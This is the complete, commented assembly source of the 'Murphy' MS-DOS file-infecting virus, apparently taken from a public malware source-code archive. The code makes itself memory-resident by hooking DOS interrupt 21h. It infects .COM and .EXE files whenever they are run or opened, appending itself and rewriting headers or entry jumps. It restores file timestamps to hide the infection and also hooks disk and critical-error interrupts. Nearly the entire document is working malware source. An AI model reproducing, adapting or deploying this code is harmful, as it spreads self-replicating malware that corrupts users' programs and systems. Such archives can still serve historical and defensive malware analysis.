MalwareSourceCode/MSDOS/M-Index/Virus.MSDOS.Unknown.murphy-1.asm

674 lines
10 KiB
NASM
Raw Permalink Normal View History

2022-08-21 09:07:57 +00:00
L0100: JMP L08D0
MOV AH,09H
MOV DX,010CH
INT 21H
L010A: INT 20H
L010C: DB 'Murphy virus V1.00 (V1277)$'
DB 1961 DUP (1)
L08D0: JMP L0C51
NOP ; \
NOP ; \
NOP ; \
L08D6: MOV AH,09H ; \
MOV DX,010CH ; > ORIGINAL 24 BYTES
INT 21H ; /
L08DD: INT 20H ; /
; /
L08DF: DB 'Murphy virus' ; /
L08EB: DW 2 DUP(0000H)
MOV WORD PTR [DI],0040H ;DB 0C7H,25H,40H,00H
AND [BX+SI],AX ;DB 21H,00H
JNO L08F7 ;DB 71H,00H
L08F7: XOR AL,[BX+DI] ;DB 32H,01H
MOV CH,02H ;DB 0B5H,02H
TEST AL,0CH ;DB 0A8H,0CH
PUSH SI ;DB 56H
ADD AX,0AF9H ;DB 05H,0F9H,0AH
EXTRN L3BC8H_0001H:FAR
JMP L3BC8H_0001H ;DB 0EAH,01H,00H,0C8H,3BH
ADD CH,[BX+SI+200CH]
L090A: DB 'Hello, I'm Murphy. Nice to meet you friend. '
DB 'I'm written since Nov/Dec.'
DB ' Copywrite (c)1989 by Lubo & Ian, Sofia, USM Laboratory. '
; ******** INT21 DRIVER ********
CALL L0C1B ; SOUND SHOW
CMP AX,4B59H ; SPECIAL FUNCTION ?
JNE L099A
PUSH BP ; \
MOV BP,SP ; \
AND WORD PTR [BP+06H],-02H ; > FLAG C = 0
POP BP ; /
IRET ; /
L099A: CMP AH,4BH ; EXEC PROGRAM ?
JE L09B1
CMP AX,3D00H ; OPEN FILE ?
JE L09B1
CMP AX,6C00H ; OPEN FILE ( MS DOS v4.xx )
JNE L09AE
CMP BL,00H
JE L09B1
L09AE: JMP L0A56 ; NO. ORIGINAL INT21
L09B1: PUSH ES ; \
PUSH DS ; > SAVE REGISTERS
L09B3: DB 'WVURQSP' ; /
CALL L0B86 ; SET NEW INT24 & INT13
CMP AX,6C00H ; \
JNE L09C4 ; > MS DOS v4.xx NAME -> DS:SI
MOV DX,SI ; /
L09C4: MOV CX,0080H
MOV SI,DX ; \
L09C9: INC SI ; \
MOV AL,[SI] ; > SEARCH EXTENSION
OR AL,AL ; /
LOOPNZ L09C9 ; /
SUB SI,+02H
CMP WORD PTR [SI],4D4FH ; 'OM' ?
JE L09EB
CMP WORD PTR [SI],4558H ; 'XE' ?
JE L09E2
L09DF: JMP SHORT L0A4A
NOP
L09E2: CMP WORD PTR [SI-02H],452EH ; '.C' ?
JE L09F2
JMP SHORT L09DF
L09EB: CMP WORD PTR [SI-02H],432EH ; '.E' ?
JNE L09DF
L09F2: MOV AX,3D02H ; OPEN FILE
CALL L0B7F
JB L0A4A
MOV BX,AX
MOV AX,5700H ; GET DATE & TIME
CALL L0B7F
MOV CS:[0121H],CX ; SAVE DATE & TIME
MOV CS:[0123H],DX
MOV AX,4200H ; MOVE 'FP' TO BEGIN FILE ???
XOR CX,CX
XOR DX,DX
CALL L0B7F
PUSH CS ; MY SEGMENT
POP DS
MOV DX,0103H ; READ ORIGINAL 24 BYTES
MOV SI,DX
MOV CX,0018H
MOV AH,3FH
CALL L0B7F
JB L0A35
CMP WORD PTR [SI],5A4DH ; 'EXE' FILE ?
JNE L0A32
CALL L0A5B ; INFECT 'EXE' FILE
JMP SHORT L0A35
L0A32: CALL L0B2B ; INFECT 'COM' FILE
L0A35: MOV AX,5701H ; SET ORIGINAL DATE & TIME
MOV CX,CS:[0121H]
MOV DX,CS:[0123H]
CALL L0B7F
MOV AH,3EH ; CLOSE FILE
CALL L0B7F ; RESTORE INT13 & INT24
L0A4A: CALL L0BC3
L0A4D: DB 'X[YZ]^_' ; RESTORE REGISTERS
POP DS
POP ES
L0A56: JMP DWORD PTR CS:[0129H] ; ORIGINAL INT21
; ******** INFECT 'EXE' PROGRAM ********
L0A5B: MOV CX,[SI+16H] ; CS SEGMENT
ADD CX,[SI+08H] ; + HEADER SIZE
MOV AX,0010H ; PARA -> BYTES
MUL CX
ADD AX,[SI+14H] ; DX:AX = START FILE
ADC DX,+00H
PUSH DX ; SAVE START FILE OFFSET
PUSH AX
MOV AX,4202H ; MOVE FP TO END FILE
XOR CX,CX ; (GET FILE SIZE)
XOR DX,DX
CALL L0B7F
CMP DX,+00H ; SIZE < 1277 ???
JNE L0A88
CMP AX,04FDH
NOP
JNB L0A88
POP AX ; QUIT
POP DX
JMP L0B0D
L0A88: MOV DI,AX ; SAVE FILE SIZE
MOV BP,DX
POP CX ; CALC CODE SIZE
SUB AX,CX
POP CX
SBB DX,CX
CMP WORD PTR [SI+0CH],+00H ; HIGH FILE ?
JE L0B0D
CMP DX,+00H ; CODE SIZE = 1277
JNE L0AA3
CMP AX,04FDH
NOP
JE L0B0D
L0AA3: MOV DX,BP ; FILE SIZE
MOV AX,DI
PUSH DX ; SAVE FILE SIZE
PUSH AX
ADD AX,04FDH ; CALC NEW FILE SIZE
NOP
ADC DX,+00H
MOV CX,0200H ; CALC FILE SIZE FOR HEADER
DIV CX
LES DI,DWORD PTR [SI+02H] ; SAVE OLD CODE SIZE
MOV CS:[0125H],DI
MOV CS:[0127H],ES
MOV [SI+02H],DX ; SAVE NEW CODE SIZE
CMP DX,+00H
JE L0ACB
INC AX
L0ACB: MOV [SI+04H],AX
POP AX ; RESTORE ORIGINAL FILE SIZE
POP DX
CALL L0B0E ; ???
SUB AX,[SI+08H]
LES DI,DWORD PTR [SI+14H] ; SAVE OLD CS:IP
MOV DS:[011BH],DI
MOV DS:[011DH],ES
MOV [SI+14H],DX ; SET NEW CS:IP
MOV [SI+16H],AX
MOV WORD PTR DS:[011FH],AX ; SAVE OFFSET
MOV AX,4202H ; MOVE FP TO END FILE
XOR CX,CX
XOR DX,DX
CALL L0B7F
CALL L0B1F ; WRITE CODE
JB L0B0D
MOV AX,4200H ; MOVE FP TO BEGIN FILE
XOR CX,CX
XOR DX,DX
CALL L0B7F
MOV AH,40H ; WRITE HEADER
MOV DX,SI
MOV CX,0018H
CALL L0B7F
L0B0D: RET
L0B0E: MOV CX,0004H ; ???
MOV DI,AX
AND DI,+0FH
L0B16: SHR DX,1
RCR AX,1
LOOP L0B16
MOV DX,DI
RET
L0B1F: MOV AH,40H ; WRITE VIRUS CODE
MOV CX,04FDH ; SIZE = 1277
NOP
MOV DX,0100H
JMP SHORT L0B7F
NOP
; ******** INFECT 'COM' PROGRAM ********
L0B2B: MOV AX,4202H ; MOVE FP TO END FILE
XOR CX,CX
XOR DX,DX
CALL L0B7F
CMP AX,04FDH ; FILE SIZE < 1277 ?
NOP
JB L0B7E
CMP AX,0FAE2H ; FILE SIZE > 64226
NOP
JNB L0B7E
PUSH AX ; SAVE SIZE
CMP BYTE PTR [SI],0E9H ; 'JUMP' CODE ?
JNE L0B53
SUB AX,0500H ; CALC OFFSET FOR VIRUS
NOP
CMP AX,[SI+01H] ; FILE IS INFECTET ?
JNE L0B53
POP AX
JMP SHORT L0B7E
L0B53: CALL L0B1F ; WRITE VIRUS CODE
JNB L0B5B
POP AX ; ERROR
JMP SHORT L0B7E
L0B5B: MOV AX,4200H ; MOVE FP TO BEGIN FILE
XOR CX,CX
XOR DX,DX
CALL L0B7F
POP AX ; CALC OFFSET FOR JUMP
SUB AX,0003H
MOV DX,011BH ; DATA ARREA
MOV SI,DX
MOV BYTE PTR CS:[SI],0E9H ; SAVE JUMP CODE TO ARREA
MOV CS:[SI+01H],AX
MOV AH,40H ; WRITE FIRST 3 BYTES
MOV CX,0003H
CALL L0B7F
L0B7E: RET
; ******** VIRUS INT21 ********
L0B7F: PUSHF
CALL DWORD PTR CS:[0129H]
RET
; ******** SET NEW INT24 & INT13 ********
L0B86: PUSH AX ; SAVE REGISTERS
PUSH DS
PUSH ES
XOR AX,AX ; SEGMENT AT VECTOR TABLE
PUSH AX
POP DS
CLI
LES AX,DWORD PTR DS:[0090H] ; \
MOV WORD PTR CS:[012DH],AX ; > GET ADDRES INT24
MOV CS:[012FH],ES ; /
MOV AX,0418H ; \
MOV WORD PTR DS:[0090H],AX ; > SET NEW INT24
MOV DS:[0092H],CS ; /
LES AX,DWORD PTR DS:[004CH] ; \
MOV WORD PTR CS:[0135H],AX ; > GET ADDRES INT13
MOV CS:[0137H],ES ; /
LES AX,DWORD PTR CS:[0131H] ; \
MOV WORD PTR DS:[004CH],AX ; > SET NEW INT13
MOV DS:[004EH],ES ; /
STI
POP ES ; RESTORE REGISTERS
POP DS
POP AX
RET
; ******** RESTORE INT24 & INT13 ********
L0BC3: PUSH AX
PUSH DS
PUSH ES
XOR AX,AX
PUSH AX
POP DS
CLI
LES AX,DWORD PTR CS:[012DH] ; \
MOV WORD PTR DS:[0090H],AX ; > RESTORE INT24
MOV DS:[0092H],ES ; /
LES AX,DWORD PTR CS:[0135H] ; \
MOV WORD PTR DS:[004CH],AX ; > RESTORE INT13
MOV DS:[004EH],ES ; /
STI
POP ES
POP DS
POP AX
RET
; ******** INT13 DRIVER ********
L0BE8: TEST AH,80H ; HARD DISK ?
JE L0BF2
JMP DWORD PTR CS:[012DH] ; YES.
L0BF2: ADD SP,+06H ; POP REGISTERS
L0BF5: DB 'X[YZ^_]'
POP DS
POP ES
PUSH BP
MOV BP,SP
OR WORD PTR [BP+06H],+01H ; FLAG C=1
POP BP
IRET
; ******** SOUOND DRIVER *********
L0C07: MOV AL,0B6H
OUT 43H,AL
MOV AX,0064H
OUT 42H,AL
MOV AL,AH
OUT 42H,AL
IN AL,61H
OR AL,03H
OUT 61H,AL
RET
; ******** SHOW DRIVER ********
L0C1B: PUSH AX ; SAVE REGISTERS
PUSH CX
PUSH DX
PUSH DS
XOR AX,AX ; DOS ARREA SEGMENT
PUSH AX
POP DS
MOV AX,WORD PTR DS:[046CH] ; GET TIME
MOV DX,DS:[046EH]
MOV CX,0FFFFH ; DIVIDE BY 65535
DIV CX ; 1 HOUR - 65535 TICKS
CMP AX,000AH ; TEN HOUR ?
JNE L0C37
CALL L0C07 ; SHOW
L0C37: POP DS ; RESTORE REGISTERS
POP DX
POP CX
POP AX
RET
L0C3C: MOV DX,0010H ; DX:AX = AX * 16
MUL DX
RET
; CLEAR REGISTERS ????
L0C42: XOR AX,AX
XOR BX,BX
XOR CX,CX
XOR DX,DX
XOR SI,SI
XOR DI,DI
XOR BP,BP
RET
L0C51: PUSH DS
CALL L0C55 ; PUSH ADDRES
L0C55: MOV AX,4B59H ; I'M IN MEMORY ?
INT 21H
L0C5A: JB L0C5F ; NO. INSERT CODE
JMP L0D87 ; START FILE
L0C5F: POP SI ; POP MY ADDRESS
PUSH SI
MOV DI,SI
XOR AX,AX ; DS = VECTOR TABLE SEGMENT
PUSH AX
POP DS
LES AX,DWORD PTR DS:[004CH] ; GET INT13 ADDRESS
MOV CS:[SI+0FCACH],AX
MOV CS:[SI+0FCAEH],ES
LES BX,DWORD PTR DS:[0084H] ; GET INT21 ADDRESS
MOV CS:[DI+0FCA4H],BX
MOV CS:[DI+0FCA6H],ES
MOV AX,WORD PTR DS:[0102H] ; SEGMENT OF INT40
CMP AX,0F000H ; IN ROM BIOS ?
JNE L0CF4 ; NO. NOT HARD DISK IN SYSTEM
MOV DL,80H
MOV AX,WORD PTR DS:[0106H] ; SEGMENT OF INT41
CMP AX,0F000H ; ROM BIOS ?
JE L0CB1
CMP AH,0C8H ; < ROM EXTERNAL ARREA
JB L0CF4
CMP AH,0F4H ; > ROM EXTERNAL ARREA
JNB L0CF4
TEST AL,7FH
JNE L0CF4
MOV DS,AX
CMP WORD PTR DS:[0000H],0AA55H ; BEGIN ROM MODUL ?
JNE L0CF4
MOV DL,DS:[0002H] ; SCANING FOR ORIGINAL INT13
L0CB1: MOV DS,AX ; ADDRESS
XOR DH,DH
MOV CL,09H
SHL DX,CL
MOV CX,DX
XOR SI,SI
L0CBD: LODSW
CMP AX,0FA80H
JNE L0CCB
LODSW
CMP AX,7380H
JE L0CD6
JNE L0CE0
L0CCB: CMP AX,0C2F6H
JNE L0CE2
LODSW
CMP AX,7580H
JNE L0CE0
L0CD6: INC SI
LODSW
CMP AX,40CDH
JE L0CE7
SUB SI,+03H
L0CE0: DEC SI
DEC SI
L0CE2: DEC SI
LOOP L0CBD
JMP SHORT L0CF4
L0CE7: SUB SI,+07H
MOV CS:[DI+0FCACH],SI
MOV CS:[DI+0FCAEH],DS
L0CF4: MOV AH,62H ; TAKE 'PSP' SEGMENT
INT 21H
L0CF8: MOV ES,BX ; FREE MY BLOCK
MOV AH,49H
INT 21H
L0CFE: MOV BX,0FFFFH ; GET BLOCK SIZE
MOV AH,48H
INT 21H
L0D05: SUB BX,0051H ; FREE SPACE ?
JB L0D87
MOV CX,ES ; CALC NEW BLOCK SIZE
STC
ADC CX,BX
MOV AH,4AH ; SET NEW SIZE
INT 21H
L0D14: MOV BX,0050H
NOP
STC
SBB ES:[0002H],BX
PUSH ES
MOV ES,CX
MOV AH,4AH
INT 21H
L0D25: MOV AX,ES
DEC AX
MOV DS,AX
MOV WORD PTR DS:[0001H],0008H
CALL L0C3C
MOV BX,AX
MOV CX,DX
POP DS
MOV AX,DS
CALL L0C3C
ADD AX,DS:[0006H]
ADC DX,+00H
SUB AX,BX
SBB DX,CX
JB L0D4E
SUB DS:[0006H],AX
L0D4E: MOV SI,DI
XOR DI,DI
PUSH CS
POP DS
SUB SI,0385H
MOV CX,04FDH
NOP
INC CX
REPZ MOVSB
MOV AH,62H
INT 21H
L0D63: DEC BX
MOV DS,BX
MOV BYTE PTR DS:[0000H],5AH
MOV DX,01B9H
XOR AX,AX
PUSH AX
POP DS
MOV AX,ES
SUB AX,0010H
MOV ES,AX
CLI
MOV DS:[0084H],DX
MOV DS:[0086H],ES
STI
DEC BYTE PTR DS:[047BH]
L0D87: POP SI
CMP WORD PTR CS:[SI+0FC7EH],5A4DH
JNE L0DAE
POP DS
MOV AX,CS:[SI+0FC9AH]
MOV BX,CS:[SI+0FC98H]
PUSH CS
POP CX
SUB CX,AX
ADD CX,BX
PUSH CX
PUSH WORD PTR CS:[SI+0FC96H]
PUSH DS
POP ES
CALL L0C42
RETF
L0DAE: POP AX
MOV AX,CS:[SI+0FC7EH]
MOV WORD PTR CS:[0100H],AX
MOV AX,CS:[SI+0FC80H]
MOV WORD PTR CS:[0102H],AX
MOV AX,0100H
PUSH AX
PUSH CS
POP DS
PUSH DS
POP ES
CALL L0C42
RET
L0DCD: DW 0000H